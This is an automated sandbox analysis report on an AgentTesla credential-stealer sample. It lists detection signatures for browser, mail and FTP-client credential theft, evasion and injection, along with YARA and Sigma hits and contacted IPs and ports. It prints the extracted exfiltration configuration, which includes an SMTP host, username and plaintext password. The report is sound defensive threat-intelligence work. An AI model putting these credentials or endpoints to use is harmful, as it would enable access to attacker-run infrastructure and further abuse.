Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe

Overview

General Information

Sample name:SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
Analysis ID:1406398
MD5:ba06df327b3ceebc2d0e7a156b011b96
SHA1:b6f5abf43f83fbcb392454e5b5717955e16571ab
SHA256:661d42791efad238f158cfc507d06b5a12cddcec8e4c2a55606c83a061e41735
Tags:exe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: MSBuild connects to smtp port
Snort IDS alert for network traffic
Yara detected AgentTesla
Check if machine is in data center or colocation facility
Connects to many IPs within the same subnet mask (likely port scanning)
Connects to many ports of the same IP (likely port scanning)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Outbound RDP Connections Over Non-Standard Tools
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: Silenttrinity Stager Msbuild Activity
Sigma detected: Suspicious Outbound Kerberos Connection
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses known network protocols on non-standard ports
Writes to foreign memory regions
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Connects to several IPs in different countries
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file does not import any functions
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Communication To Uncommon Destination Ports
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Sigma detected: Suspicious Outbound SMTP Connections
Tries to load missing DLLs
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe (PID: 7284 cmdline: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe MD5: BA06DF327B3CEEBC2D0E7A156B011B96)
    • MSBuild.exe (PID: 43772 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
    • WerFault.exe (PID: 43956 cmdline: C:\Windows\system32\WerFault.exe -u -p 7284 -s 107720 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "terminal4.veeblehosting.com", "Username": "OTUJI@gomuga.com", "Password": "Ifeanyi1987@"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.3008889130.0000000003042000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000002.00000002.3008889130.000000000301E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000002.00000002.3008889130.0000000002FF2000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000002.00000002.3008889130.0000000002FF2000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000002.00000002.3006802921.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.2.MSBuild.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              2.2.MSBuild.exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                2.2.MSBuild.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  2.2.MSBuild.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                  • 0x34247:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                  • 0x342b9:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                  • 0x34343:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                  • 0x343d5:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                  • 0x3443f:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                  • 0x344b1:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                  • 0x34547:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                  • 0x345d7:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548

                  Sigma Signatures

                  Networking

                  barindex
                  Sigma detected: MSBuild connects to smtp port
                  Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 108.170.55.203, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 43772, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 55291

                  System Summary

                  barindex
                  Sigma detected: Outbound RDP Connections Over Non-Standard Tools
                  Source: Network ConnectionAuthor: Markus Neis: Data: DestinationIp: 8.130.39.155, DestinationIsIpv6: false, DestinationPort: 3389, EventID: 3, Image: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, Initiated: true, ProcessId: 7284, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 51740
                  Sigma detected: Potentially Suspicious Malware Callback Communication
                  Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 121.204.179.70, DestinationIsIpv6: false, DestinationPort: 7777, EventID: 3, Image: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, Initiated: true, ProcessId: 7284, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 50231
                  Sigma detected: Silenttrinity Stager Msbuild Activity
                  Source: Network ConnectionAuthor: Kiran kumar s, oscd.community: Data: DestinationIp: 208.95.112.1, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 43772, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 55289
                  Sigma detected: Suspicious Outbound Kerberos Connection
                  Source: Network ConnectionAuthor: Ilyas Ochkov, oscd.community: Data: DestinationIp: 93.157.248.108, DestinationIsIpv6: false, DestinationPort: 88, EventID: 3, Image: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, Initiated: true, ProcessId: 7284, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 53641
                  Sigma detected: Communication To Uncommon Destination Ports
                  Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 195.128.96.213, DestinationIsIpv6: false, DestinationPort: 8080, EventID: 3, Image: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, Initiated: true, ProcessId: 7284, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49750
                  Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
                  Source: DNS queryAuthor: Brandon George (blog post), Thomas Patzke: Data: Image: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, QueryName: ip-api.com
                  Sigma detected: Suspicious Outbound SMTP Connections
                  Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 160.248.80.91, DestinationIsIpv6: false, DestinationPort: 2525, EventID: 3, Image: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, Initiated: true, ProcessId: 7284, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 55174

                  Snort Signatures

                  Timestamp:03/11/24-08:37:18.453417
                  SID:2856463
                  Source Port:64760
                  Destination Port:53
                  Protocol:UDP
                  Classtype:A Network Trojan was detected
                  Timestamp:03/11/24-08:37:18.658424
                  SID:2856466
                  Source Port:51325
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus / Scanner detection for submitted sample
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeAvira: detected
                  Antivirus detection for URL or domain
                  Source: http://216.169.73.65:34679Avira URL Cloud: Label: malware
                  Found malware configuration
                  Source: 2.2.MSBuild.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "terminal4.veeblehosting.com", "Username": "OTUJI@gomuga.com", "Password": "Ifeanyi1987@"}
                  Multi AV Scanner detection for domain / URL
                  Source: http://36.64.217.27:1313Virustotal: Detection: 9%Perma Link
                  Source: http://194.31.79.75:25900://proxyVirustotal: Detection: 9%Perma Link
                  Source: http://184.178.172.25:15291Virustotal: Detection: 6%Perma Link
                  Source: http://51.89.173.40:31724://proxyVirustotal: Detection: 5%Perma Link
                  Multi AV Scanner detection for submitted file
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeVirustotal: Detection: 21%Perma Link
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeReversingLabs: Detection: 23%
                  Machine Learning detection for sample
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeJoe Sandbox ML: detected
                  Source: unknownHTTPS traffic detected: 140.82.112.4:443 -> 192.168.2.4:49731 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.54.158:443 -> 192.168.2.4:51325 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 222.255.238.159:443 -> 192.168.2.4:52582 version: TLS 1.2
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.PDBq source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3071384004.0000004C540F2000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: TLpC:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.PDB source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3071384004.0000004C540F2000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.PDBH source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3071384004.0000004C540F2000.00000004.00000010.00020000.00000000.sdmp

                  Networking

                  barindex
                  Snort IDS alert for network traffic
                  Source: TrafficSnort IDS: 2856463 ETPRO TROJAN DNS Query to Hello2Malware Domain 192.168.2.4:64760 -> 1.1.1.1:53
                  Source: TrafficSnort IDS: 2856466 ETPRO TROJAN Observed Hello2Malware Domain in TLS SNI 192.168.2.4:51325 -> 104.21.54.158:443
                  Connects to many IPs within the same subnet mask (likely port scanning)
                  Source: global trafficTCP traffic: Count: 10 IPs: 212.110.188.189,212.110.188.222,212.110.188.211,212.110.188.202,212.110.188.213,212.110.188.198,212.110.188.220,212.110.188.195,212.110.188.216,212.110.188.207
                  Source: global trafficTCP traffic: Count: 13 IPs: 103.47.93.248,103.47.93.226,103.47.93.225,103.47.93.236,103.47.93.217,103.47.93.238,103.47.93.227,103.47.93.205,103.47.93.196,103.47.93.221,103.47.93.210,103.47.93.231,103.47.93.252
                  Source: global trafficTCP traffic: Count: 13 IPs: 188.132.222.194,188.132.222.141,188.132.222.168,188.132.222.7,188.132.222.167,188.132.222.9,188.132.222.3,188.132.222.5,188.132.222.40,188.132.222.51,188.132.222.23,188.132.222.12,188.132.222.14
                  Source: global trafficTCP traffic: Count: 12 IPs: 162.159.242.109,162.159.242.7,162.159.242.10,162.159.242.230,162.159.242.252,162.159.242.150,162.159.242.62,162.159.242.45,162.159.242.8,162.159.242.158,162.159.242.104,162.159.242.159
                  Source: global trafficTCP traffic: Count: 10 IPs: 156.239.50.191,156.239.50.175,156.239.50.11,156.239.50.58,156.239.50.48,156.239.50.40,156.239.50.63,156.239.50.64,156.239.50.42,156.239.50.133
                  Source: global trafficTCP traffic: Count: 10 IPs: 184.178.172.13,184.178.172.23,184.178.172.26,184.178.172.25,184.178.172.14,184.178.172.28,184.178.172.17,184.178.172.3,184.178.172.5,184.178.172.18
                  Source: global trafficTCP traffic: Count: 10 IPs: 156.239.49.172,156.239.49.19,156.239.49.181,156.239.49.88,156.239.49.124,156.239.49.132,156.239.49.253,156.239.49.131,156.239.49.222,156.239.49.218
                  Connects to many ports of the same IP (likely port scanning)
                  Source: global trafficTCP traffic: 194.163.129.90 ports 43076,0,3,4,6,7
                  Source: global trafficTCP traffic: 5.189.133.192 ports 0,3,5,50893,8,9
                  Source: global trafficTCP traffic: 62.171.131.101 ports 41055,25847,3,35006,4,7,37447
                  Source: global trafficTCP traffic: 45.11.95.166 ports 6014,6002,6005,6015,0,6,9,6009
                  Source: global trafficTCP traffic: 173.212.209.216 ports 27138,1,2,3,7,8
                  Source: global trafficTCP traffic: 45.11.95.165 ports 6010,6031,6012,6011,5220,5023,6014,5034,5212,5025,5036,6048,5213,0,4,6,8,5038,5039,6009,5219
                  Source: global trafficTCP traffic: 185.244.30.43 ports 24301,0,1,2,3,4
                  Source: global trafficTCP traffic: 132.148.245.247 ports 7183,1,60349,3,7,8
                  Source: global trafficTCP traffic: 148.72.23.56 ports 42312,3260,3,4,60069,8,4833
                  Source: global trafficTCP traffic: 94.131.14.66 ports 1080,1081,0,1,3128,8
                  Source: global trafficTCP traffic: 164.92.86.113 ports 64110,54093,63358,62987,57391,0,55651,2,3,6,54597,8,50564,60283
                  Source: global trafficTCP traffic: 162.214.102.195 ports 0,34227,56755,3,58994,5,6,50366,60891
                  Source: global trafficTCP traffic: 43.155.142.116 ports 15673,1,3,5,6,7
                  Source: global trafficTCP traffic: 107.180.88.173 ports 44568,0,2,5,35774,59820,8,9,36503
                  Source: global trafficTCP traffic: 92.205.110.47 ports 17158,19600,0,1,6,9
                  Source: global trafficTCP traffic: 162.241.6.97 ports 41274,46783,44607,59991,45629,0,31794,4,6,50563,7,60651
                  Source: global trafficTCP traffic: 72.167.38.7 ports 15410,45650,0,1,2,8,9,62191,19802
                  Source: global trafficTCP traffic: 162.241.158.204 ports 63360,41274,46783,44607,59991,0,31794,2,5,52980,50563,60651,8,9
                  Source: global trafficTCP traffic: 37.187.77.58 ports 14470,64494,21861,59870,0,52593,31355,2,3,3139,7,9,13412,18936,13574,37920,19767,10710,29380
                  Source: global trafficTCP traffic: 92.204.135.37 ports 63462,26927,16591,8623,22942,62969,58604,3,8,9,20491,55019,51229,33899,32524,34824
                  Source: global trafficTCP traffic: 194.31.79.75 ports 25900,0,2,5,31471,9,50920
                  Source: global trafficTCP traffic: 175.139.179.65 ports 0,2,4,5,8,42580
                  Source: global trafficTCP traffic: 82.223.121.72 ports 64871,15464,27137,21955,1,4,5,56002,6,4985
                  Source: global trafficTCP traffic: 163.172.129.251 ports 1,3,6,7,9,16379
                  Source: global trafficTCP traffic: 72.10.160.173 ports 7297,15261,2,7,9,10677
                  Source: global trafficTCP traffic: 154.12.253.232 ports 1,57447,2,5,7,52127
                  Source: global trafficTCP traffic: 173.249.33.122 ports 3880,64873,24654,0,3,8
                  Source: global trafficTCP traffic: 51.222.241.157 ports 40351,44029,22538,51718,36363,27206,0,5717,1,3,4,5,30011,2563,46286
                  Source: global trafficTCP traffic: 128.199.221.91 ports 7176,17532,49865,8004,33383,21605,0,3,4,7,30447
                  Source: global trafficTCP traffic: 191.103.219.225 ports 48612,1,2,4,6,8
                  Source: global trafficTCP traffic: 167.172.109.12 ports 39452,46249,39533,37355,40825,1,4,9,41491
                  Source: global trafficTCP traffic: 161.97.173.42 ports 44479,62289,0,3,5,6,50386,8,37455,5379,15015,53948
                  Source: global trafficTCP traffic: 45.240.182.120 ports 1976,1,1975,1981,8,9
                  Source: global trafficTCP traffic: 148.72.206.250 ports 14076,0,1,4,28643,6,7
                  Source: global trafficTCP traffic: 154.79.254.236 ports 0,2,3,32650,5,6
                  Source: global trafficTCP traffic: 107.180.88.41 ports 37597,24834,2,4,58037,5,6,57642,7
                  Source: global trafficTCP traffic: 162.214.227.68 ports 43435,48414,45540,34071,55392,3,4,55029,5,60433,56796,31825,37976,52208
                  Source: global trafficTCP traffic: 148.72.206.84 ports 1,2536,3,14815,4,6,34761,7
                  Source: global trafficTCP traffic: 51.15.196.107 ports 1,3,6,7,9,16379
                  Source: global trafficTCP traffic: 191.7.208.100 ports 1,3,31576,5,6,7
                  Source: global trafficTCP traffic: 207.180.198.241 ports 37443,45718,1,2,57327,7,8,55823,17228,37209
                  Source: global trafficTCP traffic: 85.25.177.53 ports 57699,58851,5,6,7,9,55217
                  Source: global trafficTCP traffic: 5.135.137.13 ports 59124,1,2,4,5,9
                  Source: global trafficTCP traffic: 161.97.163.52 ports 64120,9045,32092,64109,0,30189,1,3,31125,28593,22040,34586,8,9,55109,34916
                  Source: global trafficTCP traffic: 51.161.99.114 ports 48235,29758,2,5,7,8,9
                  Source: global trafficTCP traffic: 185.220.174.99 ports 1,59967,6,7,8,17886
                  Source: global trafficTCP traffic: 162.241.46.54 ports 58330,46849,0,3,5,8
                  Source: global trafficTCP traffic: 162.214.225.223 ports 37581,54917,43435,63452,48414,49227,43265,34071,49806,58240,40536,1,36129,4,55029,5,55742,7,9,50753,39824
                  Source: global trafficTCP traffic: 208.87.131.240 ports 41368,22566,1,3,4,6,8
                  Source: global trafficTCP traffic: 209.182.192.90 ports 28749,2,4,7,8,9
                  Source: global trafficTCP traffic: 54.36.122.16 ports 17188,1,3,29796,7,9,39713
                  Source: global trafficTCP traffic: 162.241.50.179 ports 49858,34099,57364,0,3,4,48156,9,53755,31414,35948
                  Source: global trafficTCP traffic: 163.172.137.49 ports 1,3,6,7,9,16379
                  Source: global trafficTCP traffic: 125.253.125.132 ports 0,1,4,5,6,46051
                  Source: global trafficTCP traffic: 167.71.5.83 ports 8080,1,2,3,3128,8
                  Source: global trafficTCP traffic: 51.15.210.79 ports 1,3,6,7,9,16379
                  Source: global trafficTCP traffic: 146.59.18.246 ports 9755,15860,40975,25810,58031,0,30673,4,5,7,9,49871
                  Source: global trafficTCP traffic: 109.104.187.212 ports 41890,0,1,4,8,9
                  Source: global trafficTCP traffic: 50.63.12.33 ports 9367,23859,61464,0,1,31785,14738,25492,50781,5,7,8,52814
                  Source: global trafficTCP traffic: 46.250.25.225 ports 53281,1,2,3,5,8
                  Source: global trafficTCP traffic: 80.65.28.57 ports 0,2,3,4,9,30924
                  Source: global trafficTCP traffic: 202.142.159.204 ports 41026,0,1,2,4,6
                  Source: global trafficTCP traffic: 206.189.145.23 ports 49614,59867,5,6,7,8,9
                  Source: global trafficTCP traffic: 134.255.228.209 ports 24317,1,2,3,4,7
                  Source: global trafficTCP traffic: 190.220.1.173 ports 56974,4,5,6,7,9
                  Source: global trafficTCP traffic: 66.228.33.190 ports 17464,14791,7841,0,2,24360,3,4,44809,6
                  Source: global trafficTCP traffic: 213.136.79.177 ports 38772,64556,32930,2,3,35358,7,8,13675
                  Source: global trafficTCP traffic: 141.95.160.178 ports 18951,5870,0,5,7,8
                  Source: global trafficTCP traffic: 139.59.35.1 ports 42675,2,4,5,6,7
                  Source: global trafficTCP traffic: 20.24.43.214 ports 8123,1,2,3,8,80
                  Source: global trafficTCP traffic: 92.205.61.38 ports 50903,21286,29249,36073,0,24183,3,5,9
                  Source: global trafficTCP traffic: 162.241.46.40 ports 62244,49401,56241,61579,34172,1,5,6,7,9,46097
                  Source: global trafficTCP traffic: 64.227.108.182 ports 14287,1,2,4,7,8
                  Source: global trafficTCP traffic: 51.161.33.206 ports 44523,63404,2,3,4,5,13003,29360
                  Source: global trafficTCP traffic: 91.150.77.58 ports 1,2,56921,5,6,9
                  Source: global trafficTCP traffic: 66.228.35.209 ports 17464,56560,0,4,44809,8,9
                  Source: global trafficTCP traffic: 45.117.179.179 ports 6522,14791,27836,2,35942,3547,5,6,18701,55606
                  Source: global trafficTCP traffic: 203.161.32.242 ports 61070,0,4,5,6,50640
                  Source: global trafficTCP traffic: 165.227.104.122 ports 29992,3,26042,5,8,9,58839
                  Source: global trafficTCP traffic: 107.180.90.88 ports 8078,63100,20309,3,4,5,55347,7,64081,7936
                  Source: global trafficTCP traffic: 167.172.159.43 ports 22847,2,1258,4,7,8,31306
                  Source: global trafficTCP traffic: 162.241.46.6 ports 62244,60708,61579,34172,50062,1,2,3,4,7,46097
                  Source: global trafficTCP traffic: 162.241.53.72 ports 57495,57364,4,5,7,9,53755,31414,62192
                  Source: global trafficTCP traffic: 67.205.162.103 ports 63177,14398,2,4,5,55742,7
                  Source: global trafficTCP traffic: 147.75.92.244 ports 9401,0,1,4,9,10001
                  Source: global trafficTCP traffic: 147.124.212.31 ports 11070,13276,1,2,3,24230,6,7,30479,51825
                  Source: global trafficTCP traffic: 207.244.241.165 ports 53718,1,3,5,7,8
                  Source: global trafficTCP traffic: 104.238.111.107 ports 5484,5452,3230,26305,23667,0,56225,2,30026,3,5,36049,6,7999
                  Source: global trafficTCP traffic: 92.207.253.226 ports 4145,38157,1,3,5,7,8
                  Source: global trafficTCP traffic: 161.97.170.209 ports 24606,5,58897,7,8,9,62291
                  Source: global trafficTCP traffic: 147.75.34.86 ports 0,10008,1,8,10000,10010
                  Source: global trafficTCP traffic: 107.180.103.214 ports 13286,61634,1,3,4,6
                  Source: global trafficTCP traffic: 154.16.116.166 ports 3,2512,5,7,9,39759
                  Source: global trafficTCP traffic: 92.204.134.38 ports 25825,52929,15393,9375,7785,42571,25675,29718,25416,1,2,1555,4,55425,56177,5,54467,28695,7,51123,30747,59727
                  Source: global trafficTCP traffic: 128.199.196.31 ports 21049,26579,0,1,2,27102,7,38832,57715
                  Source: global trafficTCP traffic: 88.202.230.103 ports 46475,8896,17045,4,5,6,7
                  Source: global trafficTCP traffic: 196.202.210.73 ports 0,2,3,32650,5,6
                  Source: global trafficTCP traffic: 152.67.208.80 ports 0,4,5,57048,7,8
                  Source: global trafficTCP traffic: 72.167.222.113 ports 39574,12581,1,2,41629,5,8,4125
                  Source: global trafficTCP traffic: 37.44.238.2 ports 1,53471,3,4,5,7,52611
                  Source: global trafficTCP traffic: 67.43.227.228 ports 14183,6871,9039,27149,0,3,9
                  Source: global trafficTCP traffic: 67.43.227.226 ports 25639,27149,1,2,4,7,9
                  Source: global trafficTCP traffic: 51.79.87.144 ports 41230,8533,22500,41746,30464,3,54395,4,5,9
                  Source: global trafficTCP traffic: 51.68.164.77 ports 16892,0,4,5,54504,32824
                  Source: global trafficTCP traffic: 159.223.166.21 ports 5199,5078,1372,45537,1,25154,5,9,47460
                  Source: global trafficTCP traffic: 31.24.44.92 ports 1,2,52173,3,5,7,50687,50109
                  Source: global trafficTCP traffic: 197.248.86.237 ports 0,2,3,32650,5,6
                  Source: global trafficTCP traffic: 206.130.99.162 ports 42350,0,2,3,4,5
                  Source: global trafficTCP traffic: 94.131.106.196 ports 1080,1,2,3,3128,8
                  Source: global trafficTCP traffic: 75.119.145.169 ports 38023,61553,61344,1,3,4,6
                  Source: global trafficTCP traffic: 5.189.179.57 ports 57238,2,3,5,7,8
                  Source: global trafficTCP traffic: 67.43.228.253 ports 14493,17125,15233,13153,28613,26323,25921,4617,1,2,14869,3,11923,2465,18803,9,28173,14109,17757
                  Source: global trafficTCP traffic: 67.43.228.251 ports 22669,17763,7489,11339,1,3,9
                  Source: global trafficTCP traffic: 164.92.237.188 ports 59045,63722,2,3,6,55588,7
                  Source: global trafficTCP traffic: 104.248.158.78 ports 47225,62952,2,5,6,9
                  Source: global trafficTCP traffic: 198.12.253.117 ports 1,2,31131,5,8,51258
                  Source: global trafficTCP traffic: 109.224.22.34 ports 1,2,3,51372,5,7
                  Source: global trafficTCP traffic: 92.204.136.149 ports 16691,25137,1,16928,2,3,5,53035,7,18629
                  Source: global trafficTCP traffic: 148.72.209.174 ports 38088,39027,0,3,29544,8,39458,2906,16203,4734,12446
                  Source: global trafficTCP traffic: 198.12.255.193 ports 22785,53281,1,2,6,8,6821,51612,48572
                  Source: global trafficTCP traffic: 51.15.247.93 ports 1,3,6,7,9,16379
                  Source: global trafficTCP traffic: 139.162.238.184 ports 21017,39652,22243,0,1,29870,2,3,13302
                  Source: global trafficTCP traffic: 51.161.131.84 ports 63055,43712,25843,1,58612,2,5,6,8,49202,19987
                  Source: global trafficTCP traffic: 117.160.250.163 ports 8080,8081,9990,0,80,9,81,82,9999,8828
                  Source: global trafficTCP traffic: 51.75.126.150 ports 36580,19693,36694,15474,0,3,11802,35632,5,6,34144,8,4228,37847
                  Source: global trafficTCP traffic: 37.32.98.160 ports 3,5,7,8,8998,37758
                  Source: global trafficTCP traffic: 132.148.167.243 ports 0,2,4,8,28040,17702
                  Source: global trafficTCP traffic: 170.81.141.49 ports 61437,1,3,4,6,7
                  Source: global trafficTCP traffic: 135.148.10.161 ports 51507,41146,3970,0,31696,1,5,7,6716
                  Source: global trafficTCP traffic: 67.43.236.20 ports 9257,6961,23973,1181,24603,1,16829,3,5,24493,7,2871,11729,7315,6437,1947,6429,13149,11601,24191
                  Source: global trafficTCP traffic: 72.10.164.178 ports 16593,9521,19589,13341,25623,5083,29123,28033,2643,2003,10235,11865,5097,9595,8001,13177,12121,3255,23333,6081,25799,25579,10801,4,2893,9,5149,30979,29471,9949
                  Source: global trafficTCP traffic: 162.241.45.22 ports 50528,44931,63501,0,1,3,5,6,55610
                  Source: global trafficTCP traffic: 171.244.140.160 ports 15141,5189,62310,14253,24015,56076,0,1,2,31643,3,27020,6,27056,37400,53749,8826,34559
                  Source: global trafficTCP traffic: 95.217.104.21 ports 24815,1,2,4,5,8
                  Source: global trafficTCP traffic: 31.200.242.201 ports 12196,9985,1,2,6,15755,9
                  Source: global trafficTCP traffic: 167.86.69.142 ports 36394,42214,45364,3,4,6,9
                  Source: global trafficTCP traffic: 162.214.170.144 ports 25347,0,1,3,32233,7,53548,31701
                  Source: global trafficTCP traffic: 91.134.140.160 ports 16487,48962,49687,56495,57320,27207,9141,32588,32896,53012,30895,7,8,8879,5401,9,51513,39803,49042,12217
                  Source: global trafficTCP traffic: 160.153.245.187 ports 38586,1,3,35138,4,59786,5,7,6116,31745
                  Source: global trafficTCP traffic: 174.138.176.75 ports 35891,1,3,5,8,9
                  Source: global trafficTCP traffic: 104.248.151.220 ports 63997,60915,0,1,5,6,9
                  Source: global trafficTCP traffic: 45.81.232.17 ports 27855,59421,54393,23711,1,4,6,47056,9,21481,17639,14669,4715
                  Source: global trafficTCP traffic: 51.158.79.76 ports 1,3,6,7,9,16379
                  Source: global trafficTCP traffic: 72.195.34.35 ports 0,2,27360,3,6,7
                  Source: global trafficTCP traffic: 107.180.90.248 ports 7698,6,7,8,9,43240
                  Source: global trafficTCP traffic: 41.65.55.2 ports 1976,1,6,1981,7,9
                  Source: global trafficTCP traffic: 8.213.128.90 ports 808,7,9,81,6666,7779,4506
                  Source: global trafficTCP traffic: 45.15.170.94 ports 2,3,6,7,8,32768
                  Source: global trafficTCP traffic: 92.205.110.118 ports 42086,18374,15430,1,3,3414,26570,4,7,8,53903
                  Source: global trafficTCP traffic: 51.15.142.4 ports 1,3,6,7,9,16379
                  Uses known network protocols on non-standard ports
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 42571
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 4145
